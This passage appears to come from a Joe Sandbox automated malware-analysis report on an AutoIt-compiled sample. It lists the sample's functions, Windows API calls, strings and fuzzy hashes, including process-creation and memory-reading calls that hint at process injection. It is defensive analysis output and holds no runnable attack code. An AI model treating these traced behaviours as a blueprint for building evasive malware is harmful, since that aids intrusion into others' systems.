Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 7121c300a0ff887147db8dbf9c9ab956472d6de0db1e480850d46ef9e022337a
Instruction ID: 1d695c9cce6cbd13572eebebe3d609753b79207ce5fd7c9b8a6b9106d6a990c7
Opcode Fuzzy Hash: 7121c300a0ff887147db8dbf9c9ab956472d6de0db1e480850d46ef9e022337a
Instruction Fuzzy Hash: 49415731244208EBDF1A2B78DD5DB793B19FB86710F044229FE03C62A2CB7D9A44C7A5

Function 01243888 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01243959
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01243B7F

Memory Dump Source

Source File: 00000000.00000002.1416426238.0000000001241000.00000040.00000020.00020000.00000000.sdmp, Offset: 01241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1241000_FG5wHs4fVX.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction ID: 443d4c38caf1d1e9eb21ce3b9fc7352b70597e2fe0441c6699a9c044ff1e14b6
Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction Fuzzy Hash: 2BA12974E50229EBDB18CFA8C895BEEBBB5FF48304F208159E615BB280D7759A41CF50

Function 00762C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00762C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00762CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00761CAD,?), ref: 00762CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00761CAD,?), ref: 00762CCF

Strings

AutoIt v3, xrefs: 00762C89, 00762C8E, 00762C8F
edit, xrefs: 00762CAC

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: f034c8eda41b989bcd97167a303ca6378edf11a824b1db01bc5cd42c7b956a27
Instruction ID: 79955b107f2334d424db5367f4d7c706b3f89b0af82a5b8d40f3036054056864
Opcode Fuzzy Hash: f034c8eda41b989bcd97167a303ca6378edf11a824b1db01bc5cd42c7b956a27
Instruction Fuzzy Hash: DFF0DA755402987AEB315717AC0CEB76EBDE7C6F50B00445AFA00A36A0C6691854DEB4

Function 01243668 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01243558: Sleep.KERNELBASE(000001F4), ref: 01243569

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01243777

Strings

XA46U5FGBH0PLIXN, xrefs: 012437DA, 012437DD

Memory Dump Source

Source File: 00000000.00000002.1416426238.0000000001241000.00000040.00000020.00020000.00000000.sdmp, Offset: 01241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1241000_FG5wHs4fVX.jbxd

Similarity

API ID: CreateFileSleep
String ID: XA46U5FGBH0PLIXN
API String ID: 2694422964-2283751988
Opcode ID: 17ce37acb4d573df7704b768034c620941ac2cb9d0efd86a2eac7448a0d14fd5
Instruction ID: 1185bef0eb9082c3110d9e94a996e31b856111421c25debe9eb7eddbff15c06d
Opcode Fuzzy Hash: 17ce37acb4d573df7704b768034c620941ac2cb9d0efd86a2eac7448a0d14fd5
Instruction Fuzzy Hash: 36517171D1425DEBEF15DBA4C815BEEBBB4AF19300F004199E608BB2C0D7B91B49CBA5

Function 007D2947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D2C05
DeleteFileW.KERNEL32(?), ref: 007D2C87
CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007D2C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D2CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D2CC0

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 2f5be9bdc324b5598b4bba1b32ec2f722682972143262f531b3c4f4171688f3f
Instruction ID: cdcee5ecc113f37c42755a24a37eb979a735d20373bf64edf08c7dc2ff1ce049
Opcode Fuzzy Hash: 2f5be9bdc324b5598b4bba1b32ec2f722682972143262f531b3c4f4171688f3f
Instruction Fuzzy Hash: 64B15171900119EBDF21EBA4CC89EDE777DEF58350F1040A6F909E7242EA389E468F61

Function 00795AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JOv, xrefs: 00795BA8, 00795C6C

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID: JOv
API String ID: 0-1288394439
Opcode ID: c625d944dcbac7f6d09581f01c1942204d377d2f17206f9b566afec59f9976ed
Instruction ID: ffa7e5117121fa65afa8806b053b3204564d996f8264a6e990f50ee463a43b2b
Opcode Fuzzy Hash: c625d944dcbac7f6d09581f01c1942204d377d2f17206f9b566afec59f9976ed
Instruction Fuzzy Hash: 0C51B2B1D00A2AEFCF12AFA4E849FEE7BB4BF46310F14015AF405A7291D7399901CB61

Function 00763B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00763B0F,SwapMouseButtons,00000004,?), ref: 00763B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00763B0F,SwapMouseButtons,00000004,?), ref: 00763B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00763B0F,SwapMouseButtons,00000004,?), ref: 00763B83

Strings

Control Panel\Mouse, xrefs: 00763B3E

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: a0cc54bd53c695927b756c2b4e5cedd0b6efe295f9bca918f740c0e5a4b13230
Instruction ID: e92ee00a7cd8d3e81187bee8184cfa0ac2e42212d1ef181d3edfe057340bd71e
Opcode Fuzzy Hash: a0cc54bd53c695927b756c2b4e5cedd0b6efe295f9bca918f740c0e5a4b13230
Instruction Fuzzy Hash: 1A1157B1610208FFDB218FA4DC84EEEBBB8EF01750B10846AA80AD7110E6359E40DBA4

Function 01242558 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01242D13
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01242DA9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01242DCB

Memory Dump Source

Source File: 00000000.00000002.1416426238.0000000001241000.00000040.00000020.00020000.00000000.sdmp, Offset: 01241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1241000_FG5wHs4fVX.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
Instruction ID: a32cc7433b7950a97eb3ad838c7ff42a5dcbf9270bd6be637ae2ab6e76aedd7a
Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
Instruction Fuzzy Hash: 60620E30A24658DBEB24CFA4C841BDEB775FF58300F1091A9E20DEB294E7759E81CB59

Function 0076DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 007B32B7

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 63a989a6e18ebf49b824e057930514b8010dc10f7da14297c065813668faf8c9
Instruction ID: 0a4738460d60d076262b916d113f0e3d8e5b95c43028bc6133120fb7683e8e1f
Opcode Fuzzy Hash: 63a989a6e18ebf49b824e057930514b8010dc10f7da14297c065813668faf8c9
Instruction Fuzzy Hash: CEC28C79A00215CFCB24CF58C884AADB7B1FF58310F248569ED16AB391D779ED81CBA1

Function 00763923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007A33A2

Part of subcall function 00766B57: _wcslen.LIBCMT ref: 00766B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00763A04

Strings

Line: , xrefs: 007A33EB

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 3986cd5a0c75006508cf2a4b6b8cf9bf586bac542f8a8c5c961d8bd8e7c194fd
Instruction ID: 400d769fb88c9f36f8d40e61facc6d65a334b31dbe41a405f6969bbc57dd9496
Opcode Fuzzy Hash: 3986cd5a0c75006508cf2a4b6b8cf9bf586bac542f8a8c5c961d8bd8e7c194fd
Instruction Fuzzy Hash: 9931D871408304EAC721EB10DC49BEBB7DCAF80714F00491AF99A932D1DB7C9A48CBC2

Function 0077FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00780668

Part of subcall function 007832A4: RaiseException.KERNEL32(?,?,?,0078068A,?,00831444,?,?,?,?,?,?,0078068A,00761129,00828738,00761129), ref: 00783304

__CxxThrowException@8.LIBVCRUNTIME ref: 00780685

Strings

Unknown exception, xrefs: 00780692

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 494de79b23739e9b0a82327ac076fa8687890391ab20f6f2d1a4ad8f3ab29882
Instruction ID: 8489fcfbeb0caf9eb2bb858bfce63ed2d4429784c0262ae3b0e4def8e13aec2e
Opcode Fuzzy Hash: 494de79b23739e9b0a82327ac076fa8687890391ab20f6f2d1a4ad8f3ab29882
Instruction Fuzzy Hash: E9F02234A8020DF78F14B668E85AD9E776CAE00360B608031F828C2691EF78DA69C7D0

Function 007D3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 007D302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007D3044

Strings

aut, xrefs: 007D3038

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 74de3e69264a4dee8968b07a5088e1bfca31baf0141438e67e04ed46aa1ff37c
Instruction ID: f2c9ad8ae523aa08b532ddbc0efab945e24e71740a481cb895eb61d4ed6b049d
Opcode Fuzzy Hash: 74de3e69264a4dee8968b07a5088e1bfca31baf0141438e67e04ed46aa1ff37c
Instruction Fuzzy Hash: 9DD05B7150032867DA209794AD0DFD73B6CE704750F0001517655D6091DAB49584CAD4

Function 007E7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 007E82F5
TerminateProcess.KERNEL32(00000000), ref: 007E82FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 007E84DD

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 1d26fec950b7728536124eb88c4fb843508b84528c6a4eec1c6ef7d56ab6787a
Instruction ID: cbbd84b888432b424ffdea65e22418fe6cf9e235be1ea09fa389a06d302c90c1
Opcode Fuzzy Hash: 1d26fec950b7728536124eb88c4fb843508b84528c6a4eec1c6ef7d56ab6787a
Instruction Fuzzy Hash: F9127D71908381DFC754DF28C484B2ABBE5FF89314F04895DE8998B292DB35E945CB92

Function 007610F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00761BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00761BF4
Part of subcall function 00761BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00761BFC
Part of subcall function 00761BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00761C07
Part of subcall function 00761BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00761C12
Part of subcall function 00761BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00761C1A
Part of subcall function 00761BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00761C22

Part of subcall function 00761B4A: RegisterWindowMessageW.USER32(00000004,?,007612C4), ref: 00761BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0076136A
OleInitialize.OLE32 ref: 00761388
CloseHandle.KERNEL32(00000000,00000000), ref: 007A24AB

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 400b3138fc1b80747556e6303e059428bba669b183cfc0abfcb95f01f3b0b348
Instruction ID: a8baaaca39cf82fa473e1c9d4564a0f91741f93ee5f5639a3dd202c9c5536345
Opcode Fuzzy Hash: 400b3138fc1b80747556e6303e059428bba669b183cfc0abfcb95f01f3b0b348
Instruction Fuzzy Hash: 2B71B9B5901304CECF84EFB9A94E6653AE1FBC8F407588A3AD50AD7361EB784405CF98

Function 007CC161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00763923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00763A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007CC259
KillTimer.USER32(?,00000001,?,?), ref: 007CC261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007CC270

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 2b2ab8ca40a6445147b1a5219f0d3f4cce05115ce33b1ef5a20723237bd2ba37
Instruction ID: f9d10a1f03b722166bbec6e35c720d36c8a5673aab04b3a028b8d7d06ffc890a
Opcode Fuzzy Hash: 2b2ab8ca40a6445147b1a5219f0d3f4cce05115ce33b1ef5a20723237bd2ba37
Instruction Fuzzy Hash: C931C370904744AFEB339F648899FE7BBECAB06308F04449ED6DE93241C3785A84CB51

Function 007986AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,007985CC,?,00828CC8,0000000C), ref: 00798704
GetLastError.KERNEL32(?,007985CC,?,00828CC8,0000000C), ref: 0079870E
__dosmaperr.LIBCMT ref: 00798739

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 43a50fc47bf2a7dd00f55a26c1338ef934bcf6f126a4973e3881c6fda3ccbcfd
Instruction ID: ce156b7556190042679c5915f8183f92a31624d91df89a99ba08e7fa662cc5f5
Opcode Fuzzy Hash: 43a50fc47bf2a7dd00f55a26c1338ef934bcf6f126a4973e3881c6fda3ccbcfd
Instruction Fuzzy Hash: 20012633A0563066DEA66274B84AB7E6B594B83778F390119F9148F1D3DEAD8C81C292

Function 0076DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 0076DB7B
DispatchMessageW.USER32(?), ref: 0076DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0076DB9F
Sleep.KERNEL32(0000000A), ref: 0076DBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 007B1CC9

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: f8e4c46a29474ee44592aee706034d251209dfbe8ffa473e362bd2411d30b6e5
Instruction ID: b5cf235869863a3d89ecb2ec636963ea72f9d2ab1f9571c5ac75452d85f8a179
Opcode Fuzzy Hash: f8e4c46a29474ee44592aee706034d251209dfbe8ffa473e362bd2411d30b6e5
Instruction Fuzzy Hash: F4F05E30614345DBEB30DBA08D59FEA73A8EB84710F508929E61AC70D0DB38A448CB29

Function 007D2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,007D2CD4,?,?,?,00000004,00000001), ref: 007D2FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007D2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007D3006
CloseHandle.KERNEL32(00000000,?,007D2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007D300D

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 669425a0c7ff5a82d93faabb7f7b03ada0b120b0a8598dc58544105bd316afc7
Instruction ID: 6af7c415d9309f3fc2d4b7def6ead479d5f1b27b25bfb7f727b24b109caa6fdf
Opcode Fuzzy Hash: 669425a0c7ff5a82d93faabb7f7b03ada0b120b0a8598dc58544105bd316afc7
Instruction Fuzzy Hash: 0EE0863228021877D2311755BD0DF9B3B1CDB86B71F118210F729B51D046A41511D2AD

Function 00771310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 007717F6

Strings

CALL, xrefs: 007717C6

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

